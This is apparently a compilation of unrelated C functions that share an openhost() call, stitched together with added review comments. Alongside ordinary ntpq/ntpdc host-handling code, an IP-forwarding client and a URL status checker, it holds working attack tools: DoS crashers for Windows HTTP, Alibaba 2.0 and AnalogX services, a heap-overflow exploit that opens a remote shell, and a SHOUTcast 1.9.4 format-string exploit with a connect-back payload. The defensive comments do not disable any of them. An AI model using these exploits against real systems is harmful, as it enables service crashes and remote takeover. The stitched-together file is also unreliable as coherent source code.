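/*
 * CJB IP-forwarding client entry point.
 *
 * Usage: <prog> <username> <password> [url]
 *
 * With two arguments the account is pointed at the caller's address; with a
 * third argument the account is pointed at the given URL instead.  In both
 * cases one "GET <cgiscript>?..." line is sent to the configured server.
 *
 * Returns 0 on success or when only the usage text is printed, 1 when the
 * request cannot be built or the server cannot be reached.
 *
 * Changes from the earlier version:
 *  - the request is formatted with snprintf() into a local, bounded buffer;
 *    the previous sprintf() into the shared buffer let an over-long
 *    command-line argument write past its end;
 *  - main() has an explicit int return type and return values.
 *
 * NOTE(review): the username and password are placed in the query string
 * without URL-escaping, and nothing in this function shows the connection
 * being encrypted -- confirm whether openhost() provides transport
 * security before relying on this for real credentials.  Passwords given
 * on the command line are also visible to other local users via the
 * process list.
 */
int main(int argc, char *argv[])
{
    char request[1024];
    int sock;
    int len;

    if (argc < 3) {
        printf("\n\t\tCJB Ip Forwarding client by wC (version 1.0b)\n\n");
        printf("Sintaxe: %s <username> <password> [url (offline)]\n", argv[0]);
        printf("Send flamez to [email protected], Enjoy...\n\n");
        return 0;
    }

    if (argc == 3) {
        printf("CJB Ip Forwarding client by wC (version 1.0b)\n\n");
        len = snprintf(request, sizeof request,
                       "GET %s?username=%s&password=%s\n",
                       cgiscript, argv[1], argv[2]);
    } else {
        printf("CJB Ip Forwarding Client by wC (version 1.0b)\n\n");
        len = snprintf(request, sizeof request,
                       "GET %s?username=%s&password=%s&url=%s\n",
                       cgiscript, argv[1], argv[2], argv[3]);
    }

    /* Refuse to send a truncated request rather than a silently cut one. */
    if (len < 0 || (size_t)len >= sizeof request) {
        fprintf(stderr, "Arguments too long for a single request\n\n");
        return 1;
    }

    printf("Connecting to server... (%s)\n", server);
    sock = openhost(server, port);
    if (sock == -1) {
        printf("\nCould not connect to server :/\n\n");
        return 1;
    }

    sends(sock, request);
    close(sock);

    if (argc == 3) {
        printf("Done...%s.cjb.net is now forwarding to your ip!\n\n", argv[1]);
    } else {
        printf("Account: %s.cjb.net\n", argv[1]);
        printf("Forwarding to: %s\n", argv[3]);
        printf("Done!\n\n");
    }
    return 0;
}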
/*
 * attack - connect to host:port and send one over-long HTTP request line.
 *
 * What the code does, as written: it builds "GET /command." followed by
 * 240 'A' characters and a newline in a 260-byte heap buffer, sends it with
 * sends(), closes the socket and prints that the crash was sent.  No reply
 * is read, so the closing message is the author's assumption, not a
 * confirmation.  The banner describes this as a denial of service against
 * Windows 95/98 hosts; the affected server software is not named in this
 * listing.
 *
 * Defender's view: the only thing on the wire is an HTTP request whose
 * file-name extension is 240 characters long.  A server that bounds the
 * length of the request path before copying it, or a proxy / IDS rule that
 * rejects request lines with extensions of that size, handles this class
 * of input.
 */
void attack(char *host, int port)
{
  int sock,i;
  char *buf;

  printf("\n\tDos Attack against any windows version (95/98 TESTED) by wildcoyote\n\n");
  printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
  sock=openhost(host,port);
  if(sock<=0) {
    printf("- Could not connect -\n");
    printf("Exiting...\n\n");
    exit(-1);
  }
  else printf("Connected to %s (%d)\n",host,port);

  /* Request line: fixed prefix, 240 filler characters, terminating newline. */
  buf = (char *) malloc(260);
  strcpy(buf,"GET /command.");
  for(i=0;i<240;i++) strcat(buf,"A");
  strcat(buf,"\n");
  printf("Oh k! Sending a 240'char (extension) filename request to host...\n");
  sends(sock,buf);
  close(sock);
  free(buf);
  /* Printed unconditionally; the code does not check the peer's state. */
  printf("Crash sent! The host *probably* crashed :P\n");
  printf("Send flamez to [email protected], *Enjoy*...\n\n");
}
/*
 * DoS - connect to host:port and send one over-long HTTP request line.
 *
 * What the code does, as written: it builds "GET " followed by 8193 'A'
 * characters and two newlines in an 8200-byte heap buffer, sends it with
 * sends(), closes the socket and prints that the crash was sent.  No reply
 * is read, so the closing message is the author's assumption.  The banner
 * names the target software as "Alibaba 2.0 WebServer".
 *
 * Defender's view: the observable is a GET request line of roughly 8 KB
 * with no valid path.  Enforcing a maximum request-line length in the
 * server (or in a reverse proxy in front of it) and alerting on request
 * lines of this size covers this class of input.
 */
void DoS(char *host, int port)
{
  int sock,i;
  char *buf;

  printf("\nDoS against Alibaba 2.0 WebServer by wildcoyote\n\n");
  printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
  sock=openhost(host,port);
  if(sock<=0) {
    printf("- Could not connect -\n");
    printf("Exiting...\n\n");
    exit(-1);
  }
  else printf("Connected to %s (%d)\n",host,port);
  printf("Allocating memory for DoS\n");
  buf = (char *) malloc(8200); // it takes 8173 bytes, but i wave mem ;)
  /* Request line: "GET ", filler characters, then a blank line. */
  strcpy(buf,"GET ");
  for(i=5;i<8198;i++) strcat(buf,"A");
  strcat(buf,"\n\n");
  printf("Oh k! Sending CRASH!\n");
  sends(sock,buf);
  close(sock);
  free(buf);
  /* Printed unconditionally; the code does not check the peer's state. */
  printf("Crash sent! The host *probably* crashed :P\n");
  printf("Send flamez to [email protected], *Enjoy*...\n\n");
}
/*
 * ntpq_openhost - try to open a host and record the outcome.
 *
 * Sets the file-level numhosts to 1 when openhost() reports success and to
 * 0 otherwise, and returns that same value.
 */
int
ntpq_openhost(char *hostname)
{
	numhosts = openhost(hostname) ? 1 : 0;
	return numhosts;
}
/*
 * analogXcrash - send one service command with an oversized field to host.
 *
 * What the code does, as written: it looks up entry `type` in the
 * analogXDoS_types table (service name, port, command template and
 * overflow_string_size), connects to that port, and assembles a buffer from
 * the command template in which the two-character marker "BO" is replaced
 * by overflow_string_size 'X' characters.  The buffer is sent with sends()
 * and the socket is closed.  No reply is read, so the closing messages are
 * the author's assumption, not a confirmation.
 *
 * Defender's view: the observable is an otherwise ordinary command for the
 * named service carrying one field padded with a long run of 'X'.  The fix
 * belongs in the receiving service (validate field length before copying);
 * until it is patched, restricting who can reach the listed ports limits
 * exposure.
 */
void analogXcrash(char *host, int type)
{
  char *buf;
  int sock, i, x, buffer_size;

  printf("Type Number: %d\n",type);
  printf("Service : %s\n",analogXDoS_types[type].service);
  printf("Port : %d\n",analogXDoS_types[type].port);
  printf("Let the show begin ladyes...\n");
  printf("Connecting to %s [%d]...",host,analogXDoS_types[type].port);
  sock=openhost(host,analogXDoS_types[type].port);
  if (sock==-1) {
    printf("FAILED!\n");
    printf("Couldnt connect...leaving :|\n\n");
    exit(-1);
  }
  printf("SUCCESS!\n");
  printf("Allocating memory for buffer...");
  buffer_size=(strlen(analogXDoS_types[type].command) + analogXDoS_types[type].overflow_string_size);
  if (!(buf=malloc(buffer_size))) {
    printf("FAILED!\n");
    printf("Leaving... :[\n\n");
    exit(-1);
  }
  printf("WORKED! (heh)\n");
  /* Copy the template up to the "BO" placeholder. */
  for(i=0;;i++)
    if ((analogXDoS_types[type].command[i]=='B') && (analogXDoS_types[type].command[i+1]=='O')) break;
    else buf[i]=analogXDoS_types[type].command[i];
  /* Filler that stands in for the placeholder. */
  for(x=0;x<analogXDoS_types[type].overflow_string_size;x++) strcat(buf,"X");
  /* Skip the two placeholder characters, then copy the rest of the template. */
  i+=2;
  for(;i<strlen(analogXDoS_types[type].command);i++) buf[strlen(buf)]=analogXDoS_types[type].command[i];
  printf("Sending EVIL buffer ;)\n");
  sends(sock,buf);
  close(sock);
  printf("Heh...that host should be a gonner by now ;)\n");
  printf("Was it good for you to? :)\n\n");
}
/*
 * host - show or change the host that later commands talk to.
 *
 * No arguments: report the current host, if any.
 * One argument: try to open that host.
 * Two arguments: the first must be "-4" or "-6" and selects the address
 * family template (ai_fam_templ); the second is the host to open.  Any
 * other first argument leaves everything unchanged.
 *
 * Every outcome is reported on fp.
 */
static void
host(
	struct parse *pcmd,
	FILE *fp
	)
{
	int name_idx = 0;

	if (pcmd->nargs == 0) {
		if (!havehost)
			(void) fprintf(fp, "no current host\n");
		else
			(void) fprintf(fp, "current host is %s\n",
				       currenthost);
		return;
	}

	if (pcmd->nargs == 2) {
		const char *family = pcmd->argval[0].string;

		if (strcmp("-4", family) == 0)
			ai_fam_templ = AF_INET;
		else if (strcmp("-6", family) == 0)
			ai_fam_templ = AF_INET6;
		else
			goto unchanged;
		name_idx = 1;
	}

	if (openhost(pcmd->argval[name_idx].string)) {
		(void) fprintf(fp, "current host set to %s\n", currenthost);
		return;
	}

unchanged:
	/* Either the family flag was not recognised or the open failed. */
	if (!havehost)
		(void) fprintf(fp, "still no current host\n");
	else
		(void) fprintf(fp, "current host remains %s\n", currenthost);
}
/*
 * Entry point: <prog> <target> <printer> <user> <userhost>
 *
 * Prints a banner, calls usage() when fewer than four arguments are given,
 * opens a connection to the target and hands the socket and the remaining
 * arguments to doit().  The process exit status is doit()'s return value,
 * or openhost()'s return value when that is not greater than zero.
 *
 * NOTE(review): the code relies on usage() not returning; if it did,
 * argv[1]..argv[4] would be read without having been supplied -- confirm.
 */
int main (int argc, char*argv[])
{
    char *target = NULL;
    char *printer = NULL;
    char *user = NULL;
    char *userhost = NULL;
    int port = 0;
    int sock;

    fprintf(stderr,"'lpd-mail.c' - Gus'98 with mods by Gamma\n");

    if (argc < 5)
        usage(argv[0]);

    printf("Start !!!!!!!!!!!!\n");

    target   = argv[1];
    printer  = argv[2];
    user     = argv[3];
    userhost = argv[4];

    sock = openhost(target);
    if (sock <= 0)
        exit(sock);

    exit(doit(sock,printer,target,user,userhost));
}
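/*
 * doit - send the contents of inputfile over the SSL session and print
 * whatever the peer sends back.
 *
 * host, port:  peer to connect to via openhost().
 * inputfile:   text file whose lines are written to the session in order.
 *
 * The SSL objects `ssl` and `ctx` are file-level state; presumably they are
 * set up by openhost() -- confirm.  They are released here before returning
 * once the connection has been opened.
 *
 * Changes from the earlier version:
 *  - the reply is printed with printf("%s", ...); it used to be passed to
 *    printf() as the format string, so conversion specifiers sent by the
 *    peer were interpreted by this process;
 *  - SSL_read() is limited to sizeof buf - 1 so the terminator always fits,
 *    and the loop stops on error (negative return) as well as on EOF;
 *  - a file that cannot be opened is reported instead of relying on
 *    assert(), which is compiled out under NDEBUG;
 *  - fgets() is checked, so an empty file no longer sends an uninitialised
 *    buffer and the last line is no longer sent twice;
 *  - the input file is closed.
 */
void doit(char *host, int port, char *inputfile)
{
	char buf[1024];
	FILE *f;
	int s, n;

	s = openhost(host, port);
	if (s < 0) {
		printf("Couldn't connect.\n");
		return;
	}

	f = fopen(inputfile, "r");
	if (f == NULL) {
		printf("Couldn't open %s.\n", inputfile);
		goto done;
	}

	while (fgets(buf, sizeof buf, f) != NULL) {
		size_t len = strlen(buf);

		if (len == 0)
			continue;	/* line began with a NUL byte */
		if (SSL_write(ssl, buf, (int)len) <= 0)
			break;
	}
	fclose(f);

	/* Eat the rest of the page */
	while ((n = SSL_read(ssl, buf, (int)(sizeof buf - 1))) > 0) {
		buf[n] = '\0';
		/* Peer data is untrusted: never use it as a format string. */
		printf("%s", buf);
		fflush(stdout);
	}

done:
	close(s);
	SSL_free(ssl);
	SSL_CTX_free(ctx);
}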
/*
 * main - parse arguments and handle options
 *
 * Flow, as visible in this function:
 *   1. initialise library state and pick the default address family;
 *   2. let ntpOptionProcess() consume the options, then translate the
 *      option flags into globals and queued commands (ADDCMD);
 *   3. queue every remaining argument as a host (ADDHOST), or DEFHOST when
 *      none is given;
 *   4. fall back to interactive mode when no command was queued and both
 *      stdin and stderr are terminals;
 *   5. either read commands interactively against the first host, or run
 *      every queued command against every host that can be opened.
 *
 * Always returns 0.
 */
int
ntpdcmain(
	int argc,
	char *argv[]
	)
{
	extern int ntp_optind;

	delay_time.l_ui = 0;
	delay_time.l_uf = DEFDELAY;

#ifdef SYS_VXWORKS
	clear_globals();
	taskPrioritySet(taskIdSelf(), 100 );
#endif

	init_lib();	/* sets up ipv4_works, ipv6_works */
	ssl_applink();

	/* Check to see if we have IPv6. Otherwise default to IPv4 */
	if (!ipv6_works)
		ai_fam_default = AF_INET;

	progname = argv[0];

	{
		/* Skip past the arguments the option parser consumed. */
		int optct = ntpOptionProcess(&ntpdcOptions, argc, argv);
		argc -= optct;
		argv += optct;
	}

	/* An explicit -4/-6 style option overrides the detected default. */
	if (HAVE_OPT(IPV4))
		ai_fam_templ = AF_INET;
	else if (HAVE_OPT(IPV6))
		ai_fam_templ = AF_INET6;
	else
		ai_fam_templ = ai_fam_default;

	if (HAVE_OPT(COMMAND)) {
		int cmdct = STACKCT_OPT( COMMAND );
		const char** cmds = STACKLST_OPT( COMMAND );

		while (cmdct-- > 0) {
			ADDCMD(*cmds++);
		}
	}

	debug = DESC(DEBUG_LEVEL).optOccCt;

	if (HAVE_OPT(INTERACTIVE)) {
		interactive = 1;
	}

	if (HAVE_OPT(NUMERIC)) {
		showhostnames = 0;
	}

	if (HAVE_OPT(LISTPEERS)) {
		ADDCMD("listpeers");
	}

	if (HAVE_OPT(PEERS)) {
		ADDCMD("peers");
	}

	if (HAVE_OPT(SHOWPEERS)) {
		ADDCMD("dmpeers");
	}

	/* Remaining arguments are host names; use DEFHOST when there are none. */
	if (ntp_optind == argc) {
		ADDHOST(DEFHOST);
	} else {
		for (; ntp_optind < argc; ntp_optind++)
			ADDHOST(argv[ntp_optind]);
	}

	if (numcmds == 0 && interactive == 0
	    && isatty(fileno(stdin)) && isatty(fileno(stderr))) {
		interactive = 1;
	}

	/*
	 * The block below is compiled out.  It is the older ntp_getopt()-based
	 * parser covering the same options as the code above.
	 */
#if 0
	ai_fam_templ = ai_fam_default;
	while ((c = ntp_getopt(argc, argv, "46c:dilnps")) != EOF)
	    switch (c) {
		case '4':
		    ai_fam_templ = AF_INET;
		    break;
		case '6':
		    ai_fam_templ = AF_INET6;
		    break;
		case 'c':
		    ADDCMD(ntp_optarg);
		    break;
		case 'd':
		    ++debug;
		    break;
		case 'i':
		    interactive = 1;
		    break;
		case 'l':
		    ADDCMD("listpeers");
		    break;
		case 'n':
		    showhostnames = 0;
		    break;
		case 'p':
		    ADDCMD("peers");
		    break;
		case 's':
		    ADDCMD("dmpeers");
		    break;
		default:
		    errflg++;
		    break;
	    }

	if (errflg) {
		(void) fprintf(stderr,
			       "usage: %s [-46dilnps] [-c cmd] host ...\n",
			       progname);
		exit(2);
	}

	if (ntp_optind == argc) {
		ADDHOST(DEFHOST);
	} else {
		for (; ntp_optind < argc; ntp_optind++)
		    ADDHOST(argv[ntp_optind]);
	}

	if (numcmds == 0 && interactive == 0
	    && isatty(fileno(stdin)) && isatty(fileno(stderr))) {
		interactive = 1;
	}
#endif

#ifndef SYS_WINNT /* Under NT cannot handle SIGINT, WIN32 spawns a handler */
	if (interactive)
	    (void) signal_no_reset(SIGINT, abortcmd);
#endif /* SYS_WINNT */

	/*
	 * Initialize the packet data buffer
	 */
	pktdatasize = INITDATASIZE;
	pktdata = emalloc(INITDATASIZE);

	if (numcmds == 0) {
		/*
		 * Interactive use: the result of opening the first host is
		 * deliberately discarded and the command loop starts anyway.
		 */
		(void) openhost(chosts[0]);
		getcmds();
	} else {
		int ihost;
		int icmd;

		/* Hosts that cannot be opened are skipped without comment here. */
		for (ihost = 0; ihost < numhosts; ihost++) {
			if (openhost(chosts[ihost]))
			    for (icmd = 0; icmd < numcmds; icmd++) {
				    /* Label the output when several hosts are queried. */
				    if (numhosts > 1)
					printf ("--- %s ---\n",chosts[ihost]);
				    docmd(ccmds[icmd]);
			    }
		}
	}
#ifdef SYS_WINNT
	WSACleanup();
#endif
	return(0);
} /* main end */
/*
 * exploit - send one crafted HTTP POST to host:port, then connect to a
 * second port on the same host.
 *
 * What the code does, as written:
 *   - fills a 377-byte buffer with a repeating four-byte pattern, copies
 *     the file-level `shellcode` to its start, and overwrites bytes
 *     359..375 with values the author's comments label prev_size, size
 *     field, FD and BK (the last two taken from targets[type - 1]);
 *   - wraps the buffer in a POST request whose header is
 *     "Content-Length: -800" and writes it to the socket;
 *   - waits four seconds, closes the socket, connects to TCP port 30464 on
 *     the same host and, if that succeeds, hands the socket to shell().
 * The target software is not named anywhere in this function.  `sock` is
 * not declared here, so it is file-level state; sock2 is unused.
 *
 * Defender's view:
 *   - a negative Content-Length is never valid; a server or reverse proxy
 *     that rejects it before sizing any buffer is not exposed to this
 *     request, and the header value is a simple detection signature;
 *   - the follow-up connection to an unexpected listening port (30464
 *     here) on the web server is a second observable; default-deny
 *     inbound filtering on the server blocks it;
 *   - allocators that validate chunk metadata before unlinking are the
 *     general mitigation for the kind of header values labelled above.
 */
int exploit(char *host, int port, int type)
{
  char sendbuf[500];
  char buffer[377];
  int i=0;
  int sock2;

  sock=openhost(host, port);
  if (sock==-1) {
    fprintf(stderr,"Unable to connect.\n\n");
    exit(1);
  }
  fprintf(stdout, "Attacking (%s) ...\n", host);
  memset(buffer, 0xbf, sizeof(buffer) - 1);
  for(i=0;i<376;i=i+4) {
    buffer[i] = 0xbf; /* must be a valid pointer */
    buffer[i+1] = 0xff;
    buffer[i+2] = 0xb0;
    buffer[i+3] = 0xef;
  }
  memcpy(buffer, shellcode, strlen(shellcode));
  buffer[359] = 0xff; /* prev_size */
  buffer[360] = 0xff;
  buffer[361] = 0xff;
  buffer[362] = 0xff;
  buffer[363] = 0xfc; /* size field */
  buffer[364] = 0xff;
  buffer[365] = 0xff;
  buffer[366] = 0xff;
  buffer[368] = (targets[type - 1].retloc & 0x000000ff); /* FD */
  buffer[369] = (targets[type - 1].retloc & 0x0000ff00) >> 8;
  buffer[370] = (targets[type - 1].retloc & 0x00ff0000) >> 16;
  buffer[371] = (targets[type - 1].retloc & 0xff000000) >> 24;
  buffer[372] = (targets[type - 1].ret & 0x000000ff); /* BK */
  buffer[373] = (targets[type - 1].ret & 0x0000ff00) >> 8;
  buffer[374] = (targets[type - 1].ret & 0x00ff0000) >> 16;
  buffer[375] = (targets[type - 1].ret & 0xff000000) >> 24;
  buffer[376] = 0x0;
  /* The negative Content-Length below is the part a server must reject. */
  snprintf(sendbuf, sizeof(sendbuf) -1, "POST / HTTP/1.0\n" "Content-Length: -800\n" "\n\n%s\n",buffer);
  write(sock, sendbuf, strlen(sendbuf));
  sleep(4);
  close(sock);
  /* Second connection, to a fixed port on the same host. */
  sock=openhost(host, 30464);
  if (sock==-1) {
    fprintf(stderr,"Failed.\n\n");
    exit(1);
  }
  fprintf(stdout, "Exploit successful!\n");
  fprintf(stdout, "------------------------------------------------------------------\n");
  shell(sock);
  close(sock);
  return 0;
}
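/*
 * Accept a url string, return a struct status.
 *
 * A negative status indicates a problem either connecting to the
 * machine, a url parse problem, or a reply whose first line could not be
 * parsed.  The message will tell you what, specifically happened (although
 * it doesn't distinguish between a timeout, and a connection refused).
 *
 * On success st.status is the numeric code from the reply's first line and
 * st.message is a strdup()ed copy of the first word that follows it; the
 * caller owns st.message.
 *
 * Changes from the earlier version:
 *  - the first read is limited to sizeof(line) - 1 bytes so the terminator
 *    always fits (a full 1024-byte read used to write one byte past the
 *    array);
 *  - the status-line scan stops at the terminator instead of walking past
 *    it when the reply contains no space or no reason phrase;
 *  - the drain loop stops on an error return instead of looping on it;
 *  - the connection and the parsed url are released on the "nothing
 *    returned" and "could not connect" paths as well.
 */
struct status
getstatus(char *url)
{
	int i;
	char line[1024];
	char *p, *q;
	struct url u;
	struct status st;
	struct host_ret conn;

	st.status = -1;
	st.message = NULL;
	st.bytesread = 0;

	u = parseurl(url);
	if (u.port == -1) {
		/*
		 * NOTE(review): u is not passed to freeurl() here because it
		 * is not visible whether a failed parse leaves anything to
		 * free -- confirm against parseurl().
		 */
		st.message = strdup("Invalid url request format");
		return (st);
	}

	conn = openhost(u.host, u.port, u.ssl);
	if (conn.s < 0) {
		st.message = strdup("Could not connect to host");
		freeurl(u);
		return (st);
	}

	send_data(conn, u, "GET ");
	send_data(conn, u, u.req);
	send_data(conn, u, " HTTP/1.0\n\n");

	alarm(120);
	i = recv_data(conn, u, line, sizeof(line) - 1);
	alarm(0);

	if (i < 1) {
		st.message = strdup("Timeout, or nothing returned.");
		goto cleanup;
	}

	line[i] = '\0';

	/*
	 * The reply is untrusted: every scan below stops at the terminator.
	 * First, find the space that ends the protocol token (the first
	 * character is never treated as that space).
	 */
	p = line;
	if (*p != '\0')
		p++;
	while (*p != '\0' && *p != ' ')
		p++;

	if (*p == '\0') {
		st.message = strdup("Malformed status line");
		goto cleanup;
	}

	st.status = atoi(p);

	/* Now we want the status message: skip over the status number */
	p++;
	while (*p != '\0' && *p != ' ')
		p++;

	if (*p == '\0') {
		/* Status code with no reason phrase. */
		st.message = strdup("");
	} else {
		/* Cut the message at the first whitespace character */
		q = p + 1;
		while (*q != '\0' && !iswhitey(*q))
			q++;
		*q = '\0';
		st.message = strdup(p + 1);
	}

	/* Eat the rest of the page */
	while (recv_data(conn, u, line, sizeof(line)) > 0)
		;

cleanup:
#ifdef USE_SSLEAY
	if (u.ssl) {
		if (conn.ssl)
			SSL_free(conn.ssl);
		if (conn.ctx)
			SSL_CTX_free(conn.ctx);
	}
#endif

	close(conn.s);
	freeurl(u);

	return (st);
}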
/*
 * Entry point of a tool whose banner identifies it as a remote exploit for
 * SHOUTcast v1.9.4.
 *
 * What the code does, as written:
 *   - parses -h (host), -p (port, default 8001), -a (network interface,
 *     default "ppp0") and -t (index into the file-level targets table;
 *     an out-of-range value prints the table and exits);
 *   - opens a TCP listener on port 45295, bound to the address that
 *     get_my_ip_addr() returns for the chosen interface, and copies the
 *     four bytes of that address into linux_connect_back[129..132];
 *   - builds three request strings: req (filler only, never written to a
 *     socket in this function), req1 (sent to `port`) and req2 (sent
 *     repeatedly to port 8000).  req2's path consists of %x and %n
 *     conversion specifiers, i.e. it only has an effect on a server that
 *     uses the request path as a printf-style format string;
 *   - waits with select() for an inbound connection on the listener and
 *     passes the accepted socket to shell().
 * Several locals (buf1, buf2, pass, data, hp, mode, opt, tmp) are unused.
 *
 * Defender's view:
 *   - request paths containing "%n" (or long runs of "%x") under /content/
 *     are the network signature; legitimate clients do not send them;
 *   - the root cause is server-side: request data must be passed to the
 *     printf family as an argument, never as the format; running a fixed
 *     server version is the remedy;
 *   - the final stage depends on the server process making an outbound
 *     TCP connection (to port 45295 here); egress filtering on the server
 *     blocks it and an unexpected outbound connection from the streaming
 *     service is worth alerting on.
 */
int main (int argc,char *argv[])
{
  char buf1[512];
  char buf2[512];
  char host[256];
  char pass[256]="changeme";
  char data;
  int type= 0;
  int c=0;
  int port=8001;
  char devices[256] = "ppp0";
  unsigned char *ptr;
  struct hostent *hp;
  struct sockaddr_in sin_listener;
  struct ifreq ifr;
  struct timeval timeout;
  fd_set fdread;
  int delay = 12;
  int i = 0;
  int mode = 0;
  int local_port = 0;
  int opt = 0;
  int ret = 0;
  int sin_len = sizeof (struct sockaddr_in);
  int sock = 0;
  int sock2 = 0;
  int sockd = 0;
  int listener = 0;
  int time_out = 4;
  int tmp = 0;

  srand(getpid());
  fprintf(stdout,"SHOUTcast v1.9.4 remote exploit by exworm of 0seen\n");
  fprintf(stdout,"--------------------------------------------------(www.oseen.org)\n");

  /* Command-line parsing. */
  while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF) {
    switch(c) {
      case 'p':
        port=atoi(optarg);
        if ((port <= 0) || (port > 65535)) {
          fprintf(stderr,"Invalid port.\n\n");
          exit(1);
        }
        break;
      case 'a':
        memset(devices,0x0,sizeof(devices));
        strncpy(devices,optarg,sizeof(devices) - 1);
        break;
      case 't':
        type = atoi(optarg);
        if (type == 0 || type > sizeof(targets) / 28) {
          for(i = 0; i < sizeof(targets) / 28; i++)
            fprintf(stderr, "%02d. %s - %s [0x%08x - 0x%08x]\n", i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].eax);
          return -1;
        }
        break;
      case 'h':
        memset(host,0x0,sizeof(host));
        strncpy(host,optarg,sizeof(host) - 1);
        break;
      default:
        usage(argv[0]);
        exit(1);
        break;
    }
  }

  timeout.tv_sec = time_out;
  timeout.tv_usec = 0;
  if (strlen(host) == 0) {
    usage(argv[0]);
    exit(1);
  }
  sock=openhost(host, port);
  if (sock==-1) {
    fprintf(stderr,"- Unable to connect.\n\n");
    exit(1);
  }

  /* Local listener on the address of the selected interface. */
  strncpy(ifr.ifr_name, devices, 15);
  if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
    fprintf(stderr, "socket() error.\n");
    return -1;
  }
  if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
    fprintf(stderr, "socket() error.\n");
    return -1;
  }
  ptr = get_my_ip_addr(sockd, &ifr);
  memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);
  sin_listener.sin_family = AF_INET;
  memset(&sin_listener.sin_zero, 0x00, 8);
  while(1) {
    local_port = local_port = 45295;
    sin_listener.sin_port = htons(local_port);
    if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;
  }
  listen(listener, 1);
  fprintf(stdout, "[+] lisntener...\n");

  /* The local address is written into the file-level payload. */
  linux_connect_back[129] = (unsigned int) *(ptr + 0);
  linux_connect_back[130] = (unsigned int) *(ptr + 1);
  linux_connect_back[131] = (unsigned int) *(ptr + 2);
  linux_connect_back[132] = (unsigned int) *(ptr + 3);

  /* Filler request; not sent anywhere in this function. */
  char req[1024] = "GET /content/DD" "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
  strcat(req, "DD.mp3 HTTP/1.0\r\n\r\n");

  char req1[1024] = "GET /content/AA"
    /* sprintf GOT addr */
    "\x3c\x49\x06\x08\x3d\x49\x06\x08\x3e\x49\x06\x08\x3f\x49\x06\x08";
  strcat(req1, linux_connect_back);
  strcat(req1, ".mp3 HTTP/1.0\r\n\r\n");

  /* Request path made of printf conversion specifiers (%x, %n). */
  char *req2 = "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAA-%n-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n.mp3" " /HTTP/1.0\r\n\r\n";

  printf("[*] Sending first request ...\n");
  write(sock, req1, strlen(req1));
  close(sock);
  sock=openhost(host, 8000);
  if (sock==-1) {
    fprintf(stderr,"- Unable to connect.\n\n");
    exit(1);
  }
  printf("[*] Sending second request ...\n");
  while(1) {
    write(sock, req2, strlen(req2));
    sleep(2);
    FD_ZERO(&fdread);
    FD_SET(listener, &fdread);
    timeout.tv_sec = time_out;
    timeout.tv_usec = 0;
    /* Wait for an inbound connection on the local listener. */
    while(1) {
      ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);
      if (ret < 0) {
        close(sock);
        close(listener);
        fprintf(stderr, "select() error.\n");
        return -1;
      }
      if (ret == 0) {
        fprintf(stderr, "[+] Failed, waiting %d seconds.\n" "[+] Use ctrl-c to abort.\n", delay);
        sleep(delay);
        break;
      }
      if(FD_ISSET(listener, &fdread)) {
        sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
        close(sock);
        close(listener);
        fprintf(stderr, "[+] ownedbyOseen!\n" "-----------------------------------------------------------\n");
        shell(sock2);
        close(sock2);
        return 0;
      }
    }
  }
  fprintf(stderr, "[+] Exploit failed.\n");
  close(listener);
  close(sock);
  return 0;
}